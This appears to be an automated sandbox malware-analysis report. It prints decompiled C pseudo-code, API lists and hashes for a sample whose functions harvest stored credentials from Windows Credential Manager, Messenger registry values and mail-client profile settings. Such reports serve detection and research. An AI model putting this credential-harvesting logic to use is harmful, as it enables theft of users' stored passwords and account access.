                                                                                                                                                                  0x004079d1
                                                                                                                                                                  0x00407816
                                                                                                                                                                  0x004079e4

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,7479F420), ref: 0040465E
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040782F
                                                                                                                                                                  • wcsncmp.MSVCRT(?,?,?), ref: 00407873
                                                                                                                                                                  • memset.MSVCRT ref: 00407907
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040792B
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040797F
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004079A9
                                                                                                                                                                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                  • String ID: J$Microsoft_WinInet
                                                                                                                                                                  • API String ID: 2413121283-260894208
                                                                                                                                                                  • Opcode ID: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                  • Instruction ID: 0e9b9eaeb9102773f5efe30ff018f7355b1463afce593653dd7f5536c2c1a2ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E51E3B1A083469FD710DF65C880A9BB7E8BF89304F00492EF999D3250E778E955CB97
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040DB04, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040DB04(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E0040132A( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046E1( &_v556);
				if(E004047AA(_t69, _t74) == 0) {
					L8:
					E004047FB( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E0040481B(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                                                                                                                                  0x0040db04
                                                                                                                                                                  0x0040db1d
                                                                                                                                                                  0x0040db2d
                                                                                                                                                                  0x0040db30
                                                                                                                                                                  0x0040db33
                                                                                                                                                                  0x0040db3b
                                                                                                                                                                  0x0040dc25
                                                                                                                                                                  0x0040dc2a
                                                                                                                                                                  0x0040dc36
                                                                                                                                                                  0x0040dc36
                                                                                                                                                                  0x0040db41
                                                                                                                                                                  0x0040db45
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040db4b
                                                                                                                                                                  0x0040db52
                                                                                                                                                                  0x0040db55
                                                                                                                                                                  0x0040dbcb
                                                                                                                                                                  0x0040dbce
                                                                                                                                                                  0x0040dbd1
                                                                                                                                                                  0x0040dbe5
                                                                                                                                                                  0x0040dbec
                                                                                                                                                                  0x0040dc05
                                                                                                                                                                  0x0040dc08
                                                                                                                                                                  0x0040dc10
                                                                                                                                                                  0x0040dc12
                                                                                                                                                                  0x0040dc18
                                                                                                                                                                  0x0040dc1e
                                                                                                                                                                  0x0040dc1e
                                                                                                                                                                  0x0040dc10
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040dbd1
                                                                                                                                                                  0x0040db57
                                                                                                                                                                  0x0040db5d
                                                                                                                                                                  0x0040db69
                                                                                                                                                                  0x0040dbbc
                                                                                                                                                                  0x0040dbc2
                                                                                                                                                                  0x0040dbc7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040dbc7
                                                                                                                                                                  0x0040db71
                                                                                                                                                                  0x0040db7a
                                                                                                                                                                  0x0040db90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040db95
                                                                                                                                                                  0x0040dba4
                                                                                                                                                                  0x0040dbac
                                                                                                                                                                  0x0040dbac
                                                                                                                                                                  0x0040dbb6
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7479F420), ref: 0040DB33
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040DC08
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040DBA4
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040DBB6
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DC2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                                                                                                  • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                                                                                  • API String ID: 3289975857-105384665
                                                                                                                                                                  • Opcode ID: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                                                                                                                                                                  • Instruction ID: 0f5ec9c9176e8b350c57746001926e44edf78976103d06fec131b918f38f0bed
                                                                                                                                                                  • Opcode Fuzzy Hash: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                                                                                                                                                                  • Instruction Fuzzy Hash: 02315871D01219AFCB21DFA1CC44BDEBBB8AF49314F1040B6E505B7290D6789B88DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405E50, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E00405E50(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                                  0x00405e50
                                                                                                                                                                  0x00405e56
                                                                                                                                                                  0x00405e5e
                                                                                                                                                                  0x00405e66
                                                                                                                                                                  0x00405e6b
                                                                                                                                                                  0x00405e75
                                                                                                                                                                  0x00405e7d
                                                                                                                                                                  0x00405e7f
                                                                                                                                                                  0x00405e7f
                                                                                                                                                                  0x00405e7d
                                                                                                                                                                  0x00405e9b
                                                                                                                                                                  0x00405eca
                                                                                                                                                                  0x00405e9d
                                                                                                                                                                  0x00405ea8
                                                                                                                                                                  0x00405eb0
                                                                                                                                                                  0x00405eb6
                                                                                                                                                                  0x00405eba
                                                                                                                                                                  0x00405eba
                                                                                                                                                                  0x00405ed4

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F6F,?,?), ref: 00405E75
                                                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F6F,?,?), ref: 00405E93
                                                                                                                                                                  • strlen.MSVCRT ref: 00405EA0
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,00405F6F,?,?), ref: 00405EB0
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00405F6F,?,?), ref: 00405EBA
                                                                                                                                                                  • strcpy.MSVCRT(?,Unknown Error,?,?,00405F6F,?,?), ref: 00405ECA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                  • API String ID: 3198317522-572158859
                                                                                                                                                                  • Opcode ID: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                  • Instruction ID: ee7e3b4bfe4f381a5a8dca6b6b4a58a66687d49b648cda9812902ba604a22f70
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                  • Instruction Fuzzy Hash: DC01D432604214BEEB245B61DC46EDF7E68EB09796B20403AF602B41D0DA759F40DADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040831F, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E0040831F(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00406155(_a4);
				if(_t3 != 0) {
					strcpy(0x4181b8, _a4);
					strcpy(0x4182c0, "general");
					_t6 = GetPrivateProfileIntA(0x4182c0, "rtl", 0, 0x4181b8);
					asm("sbb eax, eax");
					 *0x418304 =  ~(_t6 - 1) + 1;
					E00407F2B(0x418308, "charset", 0x3f);
					E00407F2B(0x418348, "TranslatorName", 0x3f);
					return E00407F2B(0x418388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                                  0x00408323
                                                                                                                                                                  0x0040832b
                                                                                                                                                                  0x00408339
                                                                                                                                                                  0x00408349
                                                                                                                                                                  0x0040835a
                                                                                                                                                                  0x00408363
                                                                                                                                                                  0x00408372
                                                                                                                                                                  0x00408377
                                                                                                                                                                  0x00408388
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004083a5
                                                                                                                                                                  0x004083a6

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408339
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408349
                                                                                                                                                                  • GetPrivateProfileIntA.KERNEL32 ref: 0040835A
                                                                                                                                                                    • Part of subcall function 00407F2B: GetPrivateProfileStringA.KERNEL32(004182C0,?,0041344F,00418308,?,004181B8), ref: 00407F46
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                  • API String ID: 185930432-2039793938
                                                                                                                                                                  • Opcode ID: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                                                                                                                                                                  • Instruction ID: 927989a77509199662194d441518c64dc34f1856eccff2a3d84bf87df20cc289
                                                                                                                                                                  • Opcode Fuzzy Hash: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 00F0C232EC421539C62036615C07FEA3A148BE2F10F08447FBD04B61C2EA7D49D1815E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004088C6, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E004088C6(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E004086DC(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L00412090();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L00412090();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4178e0;
				do {
					_t21 =  &_v8; // 0x4178e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4178e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E00407A69(_t107 & 0x0000ffff);
						_t121 = E00407A69(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x417ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L00412090();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L00412090();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L00412090();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E00408846(_t172);
			}

































                                                                                                                                                                  0x004088c6
                                                                                                                                                                  0x004088cf
                                                                                                                                                                  0x004088d1
                                                                                                                                                                  0x004088d9
                                                                                                                                                                  0x004088df
                                                                                                                                                                  0x004088e0
                                                                                                                                                                  0x004088ea
                                                                                                                                                                  0x004088ed
                                                                                                                                                                  0x004088f2
                                                                                                                                                                  0x004088fc
                                                                                                                                                                  0x004088fd
                                                                                                                                                                  0x00408902
                                                                                                                                                                  0x0040890c
                                                                                                                                                                  0x0040890f
                                                                                                                                                                  0x00408918
                                                                                                                                                                  0x00408919
                                                                                                                                                                  0x00408920
                                                                                                                                                                  0x00408923
                                                                                                                                                                  0x0040892a
                                                                                                                                                                  0x0040892a
                                                                                                                                                                  0x0040892a
                                                                                                                                                                  0x0040892d
                                                                                                                                                                  0x0040892f
                                                                                                                                                                  0x00408932
                                                                                                                                                                  0x00408941
                                                                                                                                                                  0x00408946
                                                                                                                                                                  0x00408955
                                                                                                                                                                  0x0040895b
                                                                                                                                                                  0x0040895e
                                                                                                                                                                  0x00408969
                                                                                                                                                                  0x00408973
                                                                                                                                                                  0x0040897b
                                                                                                                                                                  0x0040897e
                                                                                                                                                                  0x00408982
                                                                                                                                                                  0x0040899b
                                                                                                                                                                  0x0040899f
                                                                                                                                                                  0x004089ac
                                                                                                                                                                  0x004089b0
                                                                                                                                                                  0x004089b0
                                                                                                                                                                  0x004089b1
                                                                                                                                                                  0x004089b5
                                                                                                                                                                  0x004089b5
                                                                                                                                                                  0x004089c5
                                                                                                                                                                  0x004089c9
                                                                                                                                                                  0x004089d0
                                                                                                                                                                  0x004089d3
                                                                                                                                                                  0x004089d8
                                                                                                                                                                  0x004089db
                                                                                                                                                                  0x004089e6
                                                                                                                                                                  0x004089e7
                                                                                                                                                                  0x004089ec
                                                                                                                                                                  0x004089ee
                                                                                                                                                                  0x004089f1
                                                                                                                                                                  0x004089f6
                                                                                                                                                                  0x004089fc
                                                                                                                                                                  0x00408a58
                                                                                                                                                                  0x00408a58
                                                                                                                                                                  0x004089fe
                                                                                                                                                                  0x004089fe
                                                                                                                                                                  0x00408a01
                                                                                                                                                                  0x00408a03
                                                                                                                                                                  0x00408a06
                                                                                                                                                                  0x00408a08
                                                                                                                                                                  0x00408a08
                                                                                                                                                                  0x00408a12
                                                                                                                                                                  0x00408a19
                                                                                                                                                                  0x00408a1c
                                                                                                                                                                  0x00408a21
                                                                                                                                                                  0x00408a28
                                                                                                                                                                  0x00408a29
                                                                                                                                                                  0x00408a2e
                                                                                                                                                                  0x00408a33
                                                                                                                                                                  0x00408a35
                                                                                                                                                                  0x00408a35
                                                                                                                                                                  0x00408a3c
                                                                                                                                                                  0x00408a3f
                                                                                                                                                                  0x00408a45
                                                                                                                                                                  0x00408a50
                                                                                                                                                                  0x00408a50
                                                                                                                                                                  0x00408a56
                                                                                                                                                                  0x00408a5a
                                                                                                                                                                  0x00408a64
                                                                                                                                                                  0x00408a6c
                                                                                                                                                                  0x00408a6f
                                                                                                                                                                  0x00408a75
                                                                                                                                                                  0x00408a7b
                                                                                                                                                                  0x00408a81
                                                                                                                                                                  0x00408a94

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004088FD
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408919
                                                                                                                                                                  • memcpy.MSVCRT ref: 00408941
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040895E
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004089E7
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004089F1
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408A29
                                                                                                                                                                    • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                                                                                                  • String ID: d$xA
                                                                                                                                                                  • API String ID: 3781940870-3129348561
                                                                                                                                                                  • Opcode ID: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
                                                                                                                                                                  • Instruction ID: 74bd4705b90376de5a47ec474c9ee228b959cea471a61b54eb6c1cdd4b9bc2c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
                                                                                                                                                                  • Instruction Fuzzy Hash: 62515C71A01704AFD724DF39C58179ABBE4EF48354F10852EE59ADB381DB74A941CF44
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403127, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00403127(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E004030F9(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E004030F9(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E004030F9(_a4, "LoginName", _t70, 0x7f, _a8);
				E004030F9(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E004030F9(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E004030F9(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D19( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E004030F9();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060DA(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                                                                                                                                  0x00403130
                                                                                                                                                                  0x0040313a
                                                                                                                                                                  0x00403151
                                                                                                                                                                  0x0040315b
                                                                                                                                                                  0x00403165
                                                                                                                                                                  0x00403171
                                                                                                                                                                  0x00403173
                                                                                                                                                                  0x00403173
                                                                                                                                                                  0x00403191
                                                                                                                                                                  0x00403194
                                                                                                                                                                  0x0040319c
                                                                                                                                                                  0x004031ad
                                                                                                                                                                  0x004031c3
                                                                                                                                                                  0x004031dc
                                                                                                                                                                  0x004031f4
                                                                                                                                                                  0x00403200
                                                                                                                                                                  0x0040320e
                                                                                                                                                                  0x00403215
                                                                                                                                                                  0x0040321d
                                                                                                                                                                  0x0040321f
                                                                                                                                                                  0x00403224
                                                                                                                                                                  0x00403225
                                                                                                                                                                  0x00403226
                                                                                                                                                                  0x00403227
                                                                                                                                                                  0x0040322c
                                                                                                                                                                  0x0040322f
                                                                                                                                                                  0x00403237
                                                                                                                                                                  0x0040323c
                                                                                                                                                                  0x00403245
                                                                                                                                                                  0x00403248
                                                                                                                                                                  0x0040324f
                                                                                                                                                                  0x00403258
                                                                                                                                                                  0x00403258
                                                                                                                                                                  0x00403248
                                                                                                                                                                  0x00403237
                                                                                                                                                                  0x0040325b
                                                                                                                                                                  0x0040325b
                                                                                                                                                                  0x00403268
                                                                                                                                                                  0x0040326a
                                                                                                                                                                  0x0040326a
                                                                                                                                                                  0x00403275

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004030F9: GetPrivateProfileStringA.KERNEL32(00000000,?,0041344F,?,?,?), ref: 0040311D
                                                                                                                                                                  • strchr.MSVCRT ref: 0040323C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                  • API String ID: 1348940319-1729847305
                                                                                                                                                                  • Opcode ID: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                                                                                                                                                                  • Instruction ID: 730259ebfdc93430ac8a7640b0a1394381beeb8186f258e339b1e1584fb818e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                                                                                                                                                                  • Instruction Fuzzy Hash: FF31917150420ABEEF219F60CC06FD97F6CAF10359F10806AF558761D2CBB9AB949B54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F70E, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
